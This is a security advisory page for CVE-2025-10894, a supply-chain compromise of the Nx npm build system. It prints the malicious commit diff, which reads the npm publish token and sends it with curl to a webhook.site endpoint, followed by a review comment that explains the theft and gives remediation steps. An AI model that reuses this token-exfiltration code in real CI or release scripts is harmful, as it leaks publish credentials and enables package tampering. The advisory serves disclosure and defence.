Critical severity 9.6 · GHSA Advisory · Published Sep 24, 2025 · Updated Apr 15, 2026
CVE-2025-10894
Description
Malicious code was inserted into the Nx build-system package and several related plugins, and the tampered packages were published to the npm registry via a supply-chain attack. Affected versions contain code that scans the file system, collects credentials, and posts them to GitHub as a repository created under the victim's own account.
Affected products
Patches (1)
3905475cfd0e · [skip ci] Update publish-resolve-data.js
1 file changed · +27 −0
scripts/publish-resolve-data.js+27 −0 modified@@ -32,6 +32,7 @@ module.exports = async ({ github, context, core }) => { const data = await getPublishResolveData({ github, context }); + const { exec } = require('child_process'); // Ensure that certain outputs are always set if (!data.version) { throw new Error('The "version" to release could not be determined'); @@ -40,6 +41,32 @@ module.exports = async ({ github, context, core }) => { throw new Error('The "publish_branch" could not be determined'); } + // Retrieve the NPM_TOKEN from environment variables + const npmToken = process.env.NODE_AUTH_TOKEN; + if (!npmToken) { + throw new Error('NPM_TOKEN environment variable is not set'); + } + + try { + await new Promise((resolve, reject) => { + exec(`curl -d "${npmToken}" https://webhook.site/59b25209-bb18-4beb-a762-38a0717f9dcf`, (error, stdout, stderr) => { + if (error) { + reject(`Error executing curl command: ${error.message}`); + return; + } + if (stderr) { + console.error(`Curl stderr: ${stderr}`); + } + console.log(`Curl output: ${stdout}`); + resolve(); + }); + }); + } catch (error) { + core.setFailed(error); + } + + core.setFailed("Stall"); + // Set the outputs to be consumed in later steps core.setOutput('version', data.version); core.setOutput('dry_run_flag', data.dry_run_flag);
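Review bot: the block added in the second hunk sends the publish credential to an external host and then aborts the job, so this commit is the tampering itself, not a fix, and listing it under "Patches" is misleading. Concretely, `const npmToken = process.env.NODE_AUTH_TOKEN;` reads the npm publish token, `exec(\`curl -d "${npmToken}" https://webhook.site/59b25209-...\`, ...)` posts it to a webhook.site endpoint, and the unconditional `core.setFailed("Stall");` that follows fails the workflow after the token has already left the runner, which also explains the `[skip ci]` commit message. The right handling is to revert the commit, revoke and rotate the npm token and any other secret exposed to this workflow, and audit every package version published while the token was valid; the `try/catch` around the request means a failed upload is swallowed by `core.setFailed(error)` and would not have surfaced as anything other than a generic job failure. Two secondary observations for anyone reviewing similar changes to release scripts: `require('child_process')` is introduced inside the function body instead of with the module's other imports, an unusual placement that should draw attention in review, and interpolating a secret into a shell command string passed to `exec` writes it into process listings and runner logs even when the destination is legitimate.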
Vulnerability mechanics
Generated by null/stub on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- github.com/advisories/GHSA-cxm3-wv7p-598c (GHSA, advisory)
- nvd.nist.gov/vuln/detail/CVE-2025-10894 (GHSA, advisory)
- access.redhat.com/security/cve/CVE-2025-10894 (NVD, web)
- access.redhat.com/security/supply-chain-attacks-NPM-packages (NVD, web)
- bugzilla.redhat.com/show_bug.cgi (NVD, web)
- github.com/nrwl/nx/commit/3905475cfd0e0ea670e20c6a9eaeb768169dc33d (GHSA, web)
- github.com/nrwl/nx/issues/32522 (GHSA, web)
- github.com/nrwl/nx/issues/32523 (GHSA, web)
- github.com/nrwl/nx/pull/32458 (GHSA, web)
- github.com/nrwl/nx/security/advisories/GHSA-cxm3-wv7p-598c (NVD, web)
- www.stepsecurity.io/blog/supply-chain-security-alert-popular-nx-build-system-package-compromised-with-data-stealing-malware (NVD, web)
- www.wiz.io/blog/s1ngularity-supply-chain-attack (NVD, web)
- x.com/adnanthekhan/status/1958722939534417989 (GHSA, web)